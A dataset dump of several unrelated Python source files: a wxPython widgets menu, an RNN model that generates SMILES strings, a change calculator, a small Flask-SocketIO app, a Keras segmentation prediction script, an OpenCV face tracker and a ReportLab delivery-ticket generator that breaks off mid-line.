dc.Clear()\n\n\nclass WidgetsMenu(wx.Panel):\n\n def __init__(self, parent, config, manager):\n super().__init__(parent=parent)\n\n self.parent = parent\n self.config = config\n self.manager = manager\n\n widgets = os.listdir(PATH)\n if not widgets:\n self.widget_panel = NoWidgetsPanel(self, self.config)\n else:\n self.widget_panel = EmptyPanel(self, self.config)\n\n self.SetBackgroundColour(self.config.get_color('menu'))\n\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.erase_background)\n self.Bind(wx.EVT_PAINT, self.on_paint)\n self.Bind(wx.EVT_BUTTON, self.button_pressed)\n\n self.display()\n\n def display(self):\n\n self.sizer = wx.GridBagSizer()\n\n self.widget_list = WidgetsList(self, self.config, self.manager)\n self.button = SimpleButton(\n self, label='Download Widgets', config=self.config, size=(200, 40))\n\n self.sizer.Add(self.widget_list, pos=(0, 0), span=(7, 2),\n flag=wx.EXPAND | wx.TOP | wx.BOTTOM | wx.LEFT, border=10)\n self.sizer.Add(self.widget_panel, pos=(0, 2), span=(8, 8), \n flag=wx.EXPAND | wx.ALL, border=10)\n self.sizer.Add(self.button, pos=(7, 0), span=(1, 2),\n flag=wx.EXPAND | wx.BOTTOM | wx.LEFT, border=10)\n\n for i in range(7):\n self.sizer.AddGrowableRow(i)\n for i in range(2, 10):\n self.sizer.AddGrowableCol(i)\n\n self.SetSizer(self.sizer)\n self.Layout()\n\n def button_pressed(self, e):\n 
pass\n\n def erase_background(self, e):\n \"\"\"Reduces flicker.\"\"\"\n\n pass\n\n def on_paint(self, e):\n \"\"\"Handles refreshing.\"\"\"\n\n dc = wx.BufferedPaintDC(self)\n self.draw(dc)\n\n def draw(self, dc):\n \"\"\"Handles drawing.\"\"\"\n\n dc.SetBackground(wx.Brush(self.config.get_color('menu')))\n dc.Clear()\n\n width, height = self.GetClientSize()\n\n dc.SetPen(wx.Pen(self.config.get_color('border'), width=4))\n dc.SetBrush(wx.TRANSPARENT_BRUSH)\n dc.DrawRectangle(0, 0, width, height)\n\n\nclass NoWidgetsPanel(wx.Panel):\n\n def __init__(self, parent, config):\n super().__init__(parent)\n\n self.config = config\n text1 = ScaledStaticText(self, \n label='No widgets installed.', \n font=self.config.get_font('large'),\n conf=self.config)\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(text1, 1, flag=wx.EXPAND|wx.ALL, border=20)\n self.SetSizer(sizer)\n self.Layout()\n\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.erase_background)\n self.Bind(wx.EVT_PAINT, self.on_paint)\n\n def erase_background(self, e):\n pass\n\n def on_paint(self, e):\n dc = wx.BufferedPaintDC(self)\n self.draw(dc)\n\n def draw(self, dc):\n dc.SetBackground(wx.Brush(self.config.get_color('menu')))\n dc.Clear()\n\n\nclass EmptyPanel(wx.Panel):\n\n def __init__(self, parent, config):\n super().__init__(parent)\n\n self.SetBackgroundColour(config.get_color('menu'))","sub_path":"scienv/core/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":18387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"467774587","text":"\"\"\"\r\nImplementation of the RNN model\r\n\"\"\"\r\nfrom typing import List, Tuple\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as tnn\r\nimport torch.nn.functional as tnnf\r\n\r\nfrom reinvent_models.reinvent_core.models import vocabulary as mv\r\n\r\n# from models import vocabulary as mv\r\n\r\n\r\nclass RNN(tnn.Module):\r\n \"\"\"\r\n Implements a N layer GRU(M) cell including an embedding layer\r\n and an output linear layer back to the size of the vocabulary\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n voc_size,\r\n layer_size=512,\r\n num_layers=3,\r\n cell_type=\"gru\",\r\n embedding_layer_size=256,\r\n dropout=0.0,\r\n layer_normalization=False,\r\n ):\r\n \"\"\"\r\n Implements a N layer GRU|LSTM cell including an embedding layer and an output linear layer back to the size of the\r\n vocabulary\r\n :param voc_size: Size of the vocabulary.\r\n :param layer_size: Size of each of the RNN layers.\r\n :param num_layers: Number of RNN layers.\r\n :param embedding_layer_size: Size of the embedding layer.\r\n \"\"\"\r\n super(RNN, self).__init__()\r\n\r\n self._layer_size = layer_size\r\n self._embedding_layer_size = embedding_layer_size\r\n self._num_layers = num_layers\r\n self._cell_type = cell_type.lower()\r\n self._dropout = dropout\r\n self._layer_normalization = layer_normalization\r\n\r\n self._embedding = tnn.Embedding(voc_size, self._embedding_layer_size)\r\n if self._cell_type == \"gru\":\r\n self._rnn = tnn.GRU(\r\n self._embedding_layer_size,\r\n self._layer_size,\r\n num_layers=self._num_layers,\r\n dropout=self._dropout,\r\n batch_first=True,\r\n )\r\n elif self._cell_type == \"lstm\":\r\n self._rnn = tnn.LSTM(\r\n self._embedding_layer_size,\r\n self._layer_size,\r\n num_layers=self._num_layers,\r\n dropout=self._dropout,\r\n batch_first=True,\r\n )\r\n else:\r\n raise ValueError(\r\n 'Value of the parameter cell_type should be \"gru\" or \"lstm\"'\r\n )\r\n self._linear = tnn.Linear(self._layer_size, 
voc_size)\r\n\r\n def forward(self, input_vector, hidden_state=None): # pylint: disable=W0221\r\n \"\"\"\r\n Performs a forward pass on the model. Note: you pass the **whole** sequence.\r\n :param input_vector: Input tensor (batch_size, seq_size).\r\n :param hidden_state: Hidden state tensor.\r\n \"\"\"\r\n batch_size, seq_size = input_vector.size()\r\n if hidden_state is None:\r\n size = (self._num_layers, batch_size, self._layer_size)\r\n if self._cell_type == \"gru\":\r\n hidden_state = torch.zeros(*size)\r\n else:\r\n hidden_state = [torch.zeros(*size), torch.zeros(*size)]\r\n embedded_data = self._embedding(input_vector) # (batch,seq,embedding)\r\n output_vector, hidden_state_out = self._rnn(embedded_data, hidden_state)\r\n\r\n if self._layer_normalization:\r\n output_vector = tnnf.layer_norm(output_vector, output_vector.size()[1:])\r\n output_vector = output_vector.reshape(-1, self._layer_size)\r\n\r\n output_data = self._linear(output_vector).view(batch_size, seq_size, -1)\r\n\r\n return output_data, hidden_state_out\r\n\r\n def get_params(self):\r\n \"\"\"\r\n Returns the configuration parameters of the model.\r\n \"\"\"\r\n return {\r\n \"dropout\": self._dropout,\r\n \"layer_size\": self._layer_size,\r\n \"num_layers\": self._num_layers,\r\n \"cell_type\": self._cell_type,\r\n \"embedding_layer_size\": self._embedding_layer_size,\r\n }\r\n\r\n\r\nclass Model:\r\n \"\"\"\r\n Implements an RNN model using SMILES.\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n vocabulary: mv.Vocabulary,\r\n tokenizer,\r\n network_params=None,\r\n max_sequence_length=256,\r\n no_cuda=False,\r\n ):\r\n \"\"\"\r\n Implements an RNN.\r\n :param vocabulary: Vocabulary to use.\r\n :param tokenizer: Tokenizer to use.\r\n :param network_params: Dictionary with all parameters required to correctly initialize the RNN class.\r\n :param max_sequence_length: The max size of SMILES sequence that can be generated.\r\n \"\"\"\r\n self.vocabulary = vocabulary\r\n self.tokenizer = tokenizer\r\n self.max_sequence_length = max_sequence_length\r\n\r\n if not isinstance(network_params, dict):\r\n network_params = {}\r\n\r\n self.network = RNN(len(self.vocabulary), **network_params)\r\n if torch.cuda.is_available() and not no_cuda:\r\n self.network.cuda()\r\n\r\n self._nll_loss = tnn.NLLLoss(reduction=\"none\")\r\n\r\n @classmethod\r\n def load_from_file(cls, file_path: str, sampling_mode=False):\r\n \"\"\"\r\n Loads a model from a single file\r\n :param file_path: input file path\r\n :return: new instance of the RNN or an exception if it was not possible to load it.\r\n \"\"\"\r\n if torch.cuda.is_available():\r\n save_dict = torch.load(file_path)\r\n else:\r\n save_dict = torch.load(file_path, map_location=lambda storage, loc: storage)\r\n\r\n network_params = save_dict.get(\"network_params\", {})\r\n model = Model(\r\n vocabulary=save_dict[\"vocabulary\"],\r\n tokenizer=save_dict.get(\"tokenizer\", mv.SMILESTokenizer()),\r\n network_params=network_params,\r\n max_sequence_length=save_dict[\"max_sequence_length\"],\r\n )\r\n model.network.load_state_dict(save_dict[\"network\"])\r\n if sampling_mode:\r\n model.network.eval()\r\n return model\r\n\r\n def save(self, file: str):\r\n \"\"\"\r\n Saves the model into a file\r\n :param file: it's actually a path\r\n \"\"\"\r\n save_dict = {\r\n \"vocabulary\": self.vocabulary,\r\n \"tokenizer\": self.tokenizer,\r\n \"max_sequence_length\": self.max_sequence_length,\r\n \"network\": self.network.state_dict(),\r\n \"network_params\": self.network.get_params(),\r\n }\r\n 
torch.save(save_dict, file)\r\n\r\n def likelihood_smiles(self, smiles) -> torch.Tensor:\r\n tokens = [self.tokenizer.tokenize(smile) for smile in smiles]\r\n encoded = [self.vocabulary.encode(token) for token in tokens]\r\n sequences = [torch.tensor(encode, dtype=torch.long) for encode in encoded]\r\n\r\n def collate_fn(encoded_seqs):\r\n \"\"\"Function to take a list of encoded sequences and turn them into a batch\"\"\"\r\n max_length = max([seq.size(0) for seq in encoded_seqs])\r\n collated_arr = torch.zeros(\r\n len(encoded_seqs), max_length, dtype=torch.long\r\n ) # padded with zeroes\r\n for i, seq in enumerate(encoded_seqs):\r\n collated_arr[i, : seq.size(0)] = seq\r\n return collated_arr\r\n\r\n padded_sequences = collate_fn(sequences)\r\n return self.likelihood(padded_sequences)\r\n\r\n def likelihood(self, sequences) -> torch.Tensor:\r\n \"\"\"\r\n Retrieves the likelihood of a given sequence. Used in training.\r\n\r\n :param sequences: (batch_size, sequence_length) A batch of sequences\r\n :return: (batch_size) Log likelihood for each example.\r\n \"\"\"\r\n logits, _ = self.network(sequences[:, :-1]) # all steps done at once\r\n log_probs = logits.log_softmax(dim=2)\r\n return self._nll_loss(log_probs.transpose(1, 2), sequences[:, 1:]).sum(dim=1)\r\n\r\n def sample_smiles(self, num=128, batch_size=128) -> Tuple[List, np.array]:\r\n \"\"\"\r\n Samples n SMILES from the model.\r\n :param num: Number of SMILES to sample.\r\n :param batch_size: Number of sequences to sample at the same time.\r\n :return:\r\n :smiles: (n) A list with SMILES.\r\n :likelihoods: (n) A list of likelihoods.\r\n \"\"\"\r\n batch_sizes = [batch_size for _ in range(num // batch_size)] + [\r\n num % batch_size\r\n ]\r\n smiles_sampled = []\r\n likelihoods_sampled = []\r\n\r\n for size in batch_sizes:\r\n if not size:\r\n break\r\n seqs, likelihoods = self._sample(batch_size=size)\r\n smiles = [\r\n self.tokenizer.untokenize(self.vocabulary.decode(seq))\r\n for seq in seqs.cpu().numpy()\r\n ]\r\n\r\n smiles_sampled.extend(smiles)\r\n likelihoods_sampled.append(likelihoods.data.cpu().numpy())\r\n\r\n del seqs, likelihoods\r\n return smiles_sampled, np.concatenate(likelihoods_sampled)\r\n\r\n def sample_sequences_and_smiles(\r\n self, batch_size=128\r\n ) -> Tuple[torch.Tensor, List, torch.Tensor]:\r\n seqs, likelihoods = self._sample(batch_size=batch_size)\r\n smiles = [\r\n self.tokenizer.untokenize(self.vocabulary.decode(seq))\r\n for seq in seqs.cpu().numpy()\r\n ]\r\n return seqs, smiles, likelihoods\r\n\r\n # @torch.no_grad()\r\n def _sample(self, batch_size=128) -> Tuple[torch.Tensor, torch.Tensor]:\r\n start_token = torch.zeros(batch_size, dtype=torch.long)\r\n start_token[:] = self.vocabulary[\"^\"]\r\n input_vector = start_token\r\n sequences = [\r\n self.vocabulary[\"^\"] * torch.ones([batch_size, 1], dtype=torch.long)\r\n ]\r\n # NOTE: The first token never gets added in the loop so the sequences are initialized with a start token\r\n hidden_state = None\r\n nlls = torch.zeros(batch_size)\r\n for _ in range(self.max_sequence_length - 1):\r\n logits, hidden_state = self.network(input_vector.unsqueeze(1), hidden_state)\r\n logits = logits.squeeze(1)\r\n probabilities = logits.softmax(dim=1)\r\n log_probs = logits.log_softmax(dim=1)\r\n input_vector = torch.multinomial(probabilities, 1).view(-1)\r\n sequences.append(input_vector.view(-1, 1))\r\n nlls += self._nll_loss(log_probs, input_vector)\r\n if input_vector.sum() == 0:\r\n break\r\n\r\n sequences = torch.cat(sequences, 1)\r\n return 
sequences.data, nlls\r\n\r\n def get_network_parameters(self):\r\n return self.network.parameters()\r\n","sub_path":"reinvent_models/reinvent_core/models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"646890199","text":"\n\ndef bills(charge, payment):\n #next two lines turn floats to ints for coin calc later\n bills_charge = int(charge)\n bills_payment = int(payment)\n bills_tuple = ()\n #calculating coins for rounding errors that can occur - rounding the float to 2 points in the process\n coins_payment = round((payment - bills_payment), 2)\n coins_charge = round((charge - bills_charge), 2)\n #following if statement checks for need for \"rounding\"\n if coins_payment < coins_charge:\n bills_charge += 1\n # setting change up for the next if statements\n change = bills_payment - bills_charge\n #following if/else statements see if certain bills are needed, subtracts them from total, and adds number of bills needed to tuple - else statements add 0's to tuple after change = 0\n if change / 100 > 0:\n hund = (change - (change % 100))/100\n bills_tuple = bills_tuple + (int(hund),)\n change -= 100 * hund\n else:\n bills_tuple = bills_tuple + (0,)\n if change / 50 > 0:\n fifty = (change - (change % 50))/50\n bills_tuple = bills_tuple + (int(fifty),)\n change -= 50 * fifty\n else:\n bills_tuple = bills_tuple + (0,)\n if change / 20 > 0:\n twenty = (change - (change % 20))/20\n bills_tuple = bills_tuple + (int(twenty),)\n change -= 20 * twenty\n else:\n bills_tuple = bills_tuple + (0,)\n if change / 10 > 0:\n tens = (change - (change % 10))/10\n bills_tuple = bills_tuple + (int(tens),)\n change -= 10 * tens\n else:\n bills_tuple = bills_tuple + (0,)\n if change / 5 > 0:\n fives = (change - (change % 5))/5\n bills_tuple = bills_tuple + (int(fives),)\n change -= 5 * fives\n else:\n bills_tuple = bills_tuple + (0,)\n if change / 1 > 0:\n singles = (change - (change % 1))\n bills_tuple = bills_tuple + (int(singles),)\n change -= 1 * singles\n else:\n bills_tuple = bills_tuple + (0,)\n return(bills_tuple)\n \ndef coins(charge, payment): \n coins_tuple = ()\n #2 lines below gives me whole number of bills - converts float to int\n bills_charge = int(charge) \n bills_payment = int(payment) \n #next 2 give me change by subtracting bills from total amt given and rounding float to 2 places\n coins_payment = round((payment - bills_payment), 2)\n coins_charge = round((charge - bills_charge), 2)\n #next if/elif check payment/charge amount and see if i need to add 1 so that the change can be proper (accounting for situations where you could give too much change because of bill amt being 10 but really needing 9.75 for example)\n if coins_payment < coins_charge:\n coins_payment += 1\n coins = int((coins_payment - coins_charge) * 100)\n elif coins_payment >= coins_charge:\n coins = int((coins_payment - coins_charge) * 100)\n #following if statements find which coinns are needed, what amounts, and then add said amount to the tuple - else statements add 0 to tuple once coins equals 0\n if coins / 25 > 0:\n quarters = (coins - (coins % 25))/25\n coins_tuple = coins_tuple + (int(quarters),)\n coins -= 25 * quarters\n else:\n coins_tuple = coins_tuple + (0,)\n if coins / 10 > 0:\n dimes = (coins - (coins % 10))/10\n coins_tuple = coins_tuple + (int(dimes),)\n coins -= 10 * dimes\n else:\n coins_tuple = coins_tuple + (0,)\n if coins / 5 > 0:\n nickles = (coins - (coins % 5))/5\n coins_tuple = 
coins_tuple + (int(nickles),)\n coins -= 5 * nickles\n else:\n coins_tuple = coins_tuple + (0,)\n if coins / 1 > 0:\n pennies = (coins - (coins % 1))\n coins_tuple = coins_tuple + (int(pennies),)\n coins -= 1 * pennies\n else:\n coins_tuple = coins_tuple + (0,)\n return(coins_tuple)\n\ndef change_calc(charge_amt, payment_amt):\n charge = charge_amt\n payment = payment_amt\n return(bills(charge, payment), coins(charge, payment))\n\nprint(change_calc(90.51, 100.49))\n\n\n","sub_path":"change_maker.py","file_name":"change_maker.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"475151641","text":"import time\nimport random\nfrom flask import Flask, render_template\nfrom flask_socketio import SocketIO, emit\n\napp = Flask(__name__)\nsocketio = SocketIO(app)\n\n\n@app.route('/')\ndef sessions():\n return render_template('index.html')\n\n\n@socketio.on('sendData')\ndef handle_my_custom_event(json):\n emit('serverResponse', {'timestamp': time.time(), 'data': random.randint(0, 10)})\n\n\nif __name__ == '__main__':\n socketio.run(app, debug=True)\n","sub_path":"Labs/P6/Starting code/EX_1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"463645640","text":"import sys\nimport argparse\nimport glob\nimport random\n\nimport Models , LoadBatches\n\nimport cv2\nimport numpy as np\n\nfrom keras.models import load_model\n#from tqdm import tqdm\n\n\ndef parse(argv):\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--save_weights_path\", type = str, default = \"\" )\n\tparser.add_argument(\"--epoch_number\", type = int, default = 5 )\n\tparser.add_argument(\"--test_images\", type = str , default = \"\")\n\tparser.add_argument(\"--output_path\", type = str , default = \"\")\n\tparser.add_argument(\"--input_height\", type=int , default = 224 )\n\tparser.add_argument(\"--input_width\", type=int , default = 224 )\n\tparser.add_argument(\"--model_name\", type = str , default = \"\")\n\tparser.add_argument(\"--n_classes\", type=int )\n\n\treturn parser.parse_args(argv)\n\n\ndef predict(args):\n\t\n\tsave_weights_path = args.save_weights_path\n\tepoch_number = args.epoch_number\n\timages_path = args.test_images\n\toutput_path = args.output_path\n\tinput_height = args.input_height\n\tinput_width = args.input_width\n\tmodel_name = args.model_name\n\tn_classes = args.n_classes\n\t\n\tmodelFns = { 'vgg_segnet':Models.VGGSegnet.VGGSegnet , 'vgg_unet':Models.VGGUnet.VGGUnet , 'vgg_unet2':Models.VGGUnet.VGGUnet2 , 'fcn8':Models.FCN8.FCN8 , 'fcn32':Models.FCN32.FCN32 }\n\tmodelFN = modelFns[ model_name ]\n\n\tm = modelFN( n_classes , input_height=input_height, input_width=input_width )\n\tm.load_weights( args.save_weights_path + \".\" + str( epoch_number ) )\n\tm.compile(loss='categorical_crossentropy',\n\t optimizer= 'adadelta' ,\n\t metrics=['accuracy'])\n\n\n\toutput_height = m.outputHeight\n\toutput_width = m.outputWidth\n\n\timages = glob.glob( images_path + \"*.jpg\" ) + glob.glob( images_path + \"*.png\" ) + glob.glob( images_path + \"*.jpeg\" )\n\timages.sort()\n\n\tcolors = [ ( random.randint(0,255),random.randint(0,255),random.randint(0,255) ) for _ in range(n_classes) ]\n\n\t#for imgName in tqdm(images):\n\tfor imgName in images:\n\t\toutName = imgName.replace( images_path , args.output_path )\n\t\tX = LoadBatches.getImageArr(imgName , args.input_width , args.input_height 
)\n\t\tpr = m.predict( np.array([X]) )[0]\n\t\tpr = pr.reshape(( output_height , output_width , n_classes ) ).argmax( axis=2 )\n\t\tseg_img = np.zeros( ( output_height , output_width , 3 ) )\n\t\tfor c in range(n_classes):\n\t\t\tseg_img[:,:,0] += ( (pr[:,: ] == c )*( colors[c][0] )).astype('uint8')\n\t\t\tseg_img[:,:,1] += ((pr[:,: ] == c )*( colors[c][1] )).astype('uint8')\n\t\t\tseg_img[:,:,2] += ((pr[:,: ] == c )*( colors[c][2] )).astype('uint8')\n\t\tseg_img = cv2.resize(seg_img , (input_width , input_height ))\n\t\tcv2.imwrite( outName , seg_img )\n\n\nif __name__ == '__main__':\n\targv = sys.argv\n\targs = parse(argv[1:])\n\n\tpredict(args)","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"467078778","text":"#object that uses camshift and/or viola jones to track face\n\nimport cv2 as cv\nimport faceGestureRecognitionV2\nfrom CamShiftObject import CamShiftObject\nimport threading\n\nclass FaceTracking:\n face = None\n leftabove = None\n rightunder = None\n cap = None\n\n # these are needed to find the angle under which the box is rotated\n headangle = None\n lefteyeangle = None\n righteyeangle = None\n\n # these are used to indicate f camshift is required, if the eye has been detected by viola_jones, then camshift is\n # unnecessary\n foundhead = False\n foundeyes = False\n\n cam_head = None\n cam_lefteye = None\n cam_righteye = None\n\n#for showing the squares\n rethead = None\n retlefteye = None\n retrighteye = None\n\n check_timer = False\n\n def __init__(self, i_cap):\n self.cap = i_cap\n while self.face is None:\n ret, frame = i_cap.read()\n faces = faceGestureRecognitionV2.getFaces(frame)\n cv.imshow('looking for face', frame)\n if len(faces) > 0:\n face = faces[0]\n cv.rectangle(frame, (face.startX, face.startY), (face.startX + face.width, face.startY + face.height),\n (255, 0, 0), 2)\n if face.leftEyeY:\n cv.rectangle(frame,(face.leftEyeX,face.leftEyeY),\n (face.leftEyeX+face.eyeWidth,face.leftEyeY+face.eyeHeight),\n (255,0,0),2)\n cv.imshow('looking for face', frame)\n if face.leftEyeX is not None and face.startX is not None:\n self.face = face\n self.headangle = 0\n self.rethead = ((face.startX + face.width/2, face.startY + face.height/2), (face.width, face.height), 0)\n self.cam_head = CamShiftObject(frame, face.startX, face.startY, face.width, face.height)\n\n self.lefteyeangle = 0\n self.cam_lefteye = CamShiftObject(frame, face.leftEyeX, face.leftEyeY, face.eyeWidth, face.eyeHeight)\n self.retlefteye = ((face.leftEyeX + face.eyeWidth / 2, face.leftEyeY + face.eyeHeight / 2),\n (face.eyeWidth, face.eyeHeight), 0)\n\n self.righteyeangle = 0\n self.retrighteye = ((face.rightEyeX + face.eyeWidth / 2, face.rightEyeY + face.eyeHeight / 2),\n (face.eyeWidth, face.eyeHeight), 0)\n self.cam_righteye = CamShiftObject(frame, face.rightEyeX, face.rightEyeY, face.eyeWidth, face.eyeHeight)\n\n self.timer()\n cv.destroyAllWindows()\n cv.waitKey(1)\n\n def check_viola_jones(self, frame):\n foundFaces = faceGestureRecognitionV2.getFaces(frame)\n self.foundeyes = False\n self.foundhead = False\n if len(foundFaces) != 0:\n face = foundFaces[0]\n if face.startX is not None:\n # self.foundhead = True\n self.face.setHead(face.startX, face.startY, face.width, face.height)\n self.rethead = (\n (face.startX + face.width / 2, face.startY + face.height / 2), (face.width, face.height), 0)\n self.cam_head.roi_setup(frame, face.startX, face.startY, 
face.width, face.height)\n\n if face.leftEyeX is not None and face.startX is not None:\n self.face.setEyes(face.leftEyeX, face.leftEyeY, face.rightEyeX, face.rightEyeY, face.eyeWidth, face.eyeHeight)\n # self.foundeyes = True\n\n self.retlefteye = ((face.leftEyeX + face.eyeWidth / 2, face.leftEyeY + face.eyeHeight / 2),\n (face.eyeWidth, face.eyeHeight), 0)\n self.cam_lefteye.roi_setup(frame, face.leftEyeX, face.leftEyeY, face.eyeWidth, face.eyeHeight)\n\n self.retrighteye = ((face.rightEyeX + face.eyeWidth / 2, face.rightEyeY + face.eyeHeight / 2),\n (face.eyeWidth, face.eyeHeight), 0)\n\n def MeanShiftTracking(self, cam_tracker, frame):\n track_window = cam_tracker.track_window\n # set up the ROI for tracking\n roi_hist = cam_tracker.roi_hist\n term_crit = cam_tracker.term_crit\n\n hsv = cv.cvtColor(frame, cv.COLOR_BGR2HSV)\n dst = cv.calcBackProject([hsv], [0], roi_hist, [0, 180], 1)\n # apply meanshift to get the new location\n ret, track_window = cv.meanShift(dst, track_window, term_crit)\n\n return ret, track_window\n\n # def InitOpenCVTracking(self, CV_tracker, frame):\n\n\n def CamshiftTracking(self, cam_tracker, frame):\n track_window = cam_tracker.track_window\n # set up the ROI for tracking\n roi_hist = cam_tracker.roi_hist\n term_crit = cam_tracker.term_crit\n\n hsv = cv.cvtColor(frame, cv.COLOR_BGR2HSV)\n dst = cv.calcBackProject([hsv],[0],roi_hist,[0,180],1)\n # apply meanshift to get the new location\n ret, track_window = cv.CamShift(dst, track_window, term_crit)\n\n return ret, track_window\n\n # def OpenCV_Tracking(self, cam_tracker, frame):\n\n\n def GetEyes(self):\n eye1 = self.cam_lefteye.roi\n eye2 = self.cam_righteye.roi\n return eye1, eye2\n\n def timer(self):\n self.check_timer = True\n threading.Timer(1, self.timer).start()\n\n def PerformFaceTracking(self):\n ret, frame = self.cap.read()\n if self.check_timer:\n self.check_viola_jones(frame)\n self.check_timer = False\n # self.foundeyes = False\n # self.foundhead = False\n else:\n # https://docs.opencv.org/3.4/db/df8/tutorial_py_meanshift.html\n if not self.foundhead:\n ret, track_window = self.MeanShiftTracking(self.cam_head, frame)\n # self.headangle = ret[2]\n # self.rethead = ret\n self.face.setHead(track_window[0], track_window[1], track_window[2], track_window[3])\n if not self.foundeyes:\n ret, track_window_left = self.MeanShiftTracking(self.cam_lefteye, frame)\n # self.lefteyeangle = ret[2]\n # self.retlefteye = ret\n\n ret, track_window_right = self.MeanShiftTracking(self.cam_righteye, frame)\n # self.righteyeangle = ret[2]\n # self.retrighteye = ret\n\n self.face.setEyes(track_window_left[0], track_window_left[1], track_window_right[0], track_window_right[1],\n track_window_right[2],\n track_window_right[3])","sub_path":"Tracker.py","file_name":"Tracker.py","file_ext":"py","file_size_in_byte":6659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"215614199","text":"from reportlab.pdfgen import canvas\r\nfrom reportlab.lib.utils import ImageReader\r\nfrom reportlab.lib.units import mm\r\nfrom reportlab.lib.pagesizes import A4\r\nfrom django.conf import settings\r\nfrom django.db.models import Sum\r\nfrom reportlab.pdfbase.pdfmetrics import stringWidth\r\nfrom batches.models import Drop, Recipe_Detail, Ingredient\r\nfrom django.db.models import Max, Sum, Avg, F\r\n\r\ndef createDocket(b):\r\n r = b.recipe\r\n\r\n # initialise canvas object for ticket\r\n filename = 'b' + str(b.batch_no).zfill(8) + '.pdf'\r\n filepath = settings.MEDIA_ROOT + '\\\\' + 
filename\r\n p = canvas.Canvas(filepath, pagesize=A4)\r\n pw, ph = A4\r\n p.setTitle('Delivery Ticket')\r\n p.setLineWidth(0.5)\r\n\r\n # margins setup\r\n marg = {'l':20, 'r':20, 't':10, 'b':10}\r\n w = pw-marg['l']-marg['r']\r\n h = ph-marg['t']-marg['b']\r\n p.translate(marg['l'], marg['b'])\r\n # p.setStrokeColorRGB(0.2,0.5,0.3)\r\n # p.setFillColorRGB(1, 1, 1)\r\n \r\n # draw title in top corner\r\n ct = cursor(p,w,h-14,size=14)\r\n ct.write('DELIVERY TICKET', align='r')\r\n\r\n # Name and Address\r\n\r\n ch = cursor(p,0,h-20,size=20)\r\n ch.write('FOGARTY CONCRETE')\r\n ch.size = 12; ch.newline();\r\n ch.listwrite([\r\n ['Gurrane, Templederry, Nenagh, Co. Tipperary'],\r\n ['Telephone: 0504-52151 Fax: 0504-52957'],\r\n ['Mobile: 087-2831415 (Andy), 086-3813399 (Plant)'],\r\n ['Email: andrewfogarty@eircom.net']\r\n ])\r\n\r\n c1 = cursor(p,0,0,size=12,font='Helvetica')\r\n c2 = cursor(p,0,0,size=12,ls=0.65,font='Courier')\r\n \r\n t1 = table(p,\r\n left=0,\r\n top=h-110,\r\n row_heights=[22, 150],\r\n col_widths=[w/2, w/2],\r\n )\r\n t1.place_cursor(c1,1,1);\r\n c1.write('Client')\r\n t1.place_cursor(c1,1,2);\r\n c1.write('Loading')\r\n t1.place_cursor(c2,2,1);\r\n c2.listwrite((\r\n ('Name:', str(b.client)),\r\n ('Delivery Address:', b.deliv_addr_1, b.deliv_addr_2, b.deliv_addr_3, b.deliv_addr_4, b.eircode)\r\n ))\r\n t1.place_cursor(c2,2,2);\r\n c2.listwrite((\r\n ('Date:', str(b.start_datetime().date())),\r\n ('Time of Loading:', str(b.end_datetime().time())),\r\n ('Driver:', b.driver.name),\r\n ('Truck Reg.:', b.truck.reg)\r\n ))\r\n\r\n t2 = table(p, \r\n left=t1.left,\r\n top=t1.bottom,\r\n row_heights=[22,80],\r\n col_widths=[w/6, w/6, w/2, w/6],\r\n bord_t=False,\r\n )\r\n t2.place_cursor(c1,1,1)\r\n c1.write('Batch No.')\r\n t2.place_cursor(c1,1,2)\r\n c1.write('Product Code')\r\n t2.place_cursor(c1,1,3)\r\n c1.write('Description')\r\n t2.place_cursor(c1,1,4)\r\n c1.write('Quantity')\r\n t2.place_cursor(c2,2,1)\r\n c2.write(str(b))\r\n t2.place_cursor(c2,2,2)\r\n c2.write(r.get_strength_class_display())\r\n t2.place_cursor(c2,2,3)\r\n c2.wrap_write(r.description,32)\r\n t2.place_cursor(c2,2,4)\r\n c2.write('%.1f m^3' % (b.volume))\r\n\r\n t3 = table(p, \r\n left=t2.left,\r\n top=t2.bottom,\r\n row_heights=[22,260],\r\n col_widths=[w/2,w/2],\r\n bord_t=False,\r\n )\r\n t3.place_cursor(c1,1,1)\r\n c1.write('Composition')\r\n t3.place_cursor(c1,1,2)\r\n c1.write('On Site')\r\n t3.place_cursor(c2,2,1)\r\n c2.listwrite((\r\n ('Admixtures:',) + tuple(r.admixtures_as_list()),\r\n ('Slump:', r.get_slump_class_display()),\r\n ('Max Agg Size (D):', '%i mm' % (r.aggregate_D())),\r\n ('Min. 
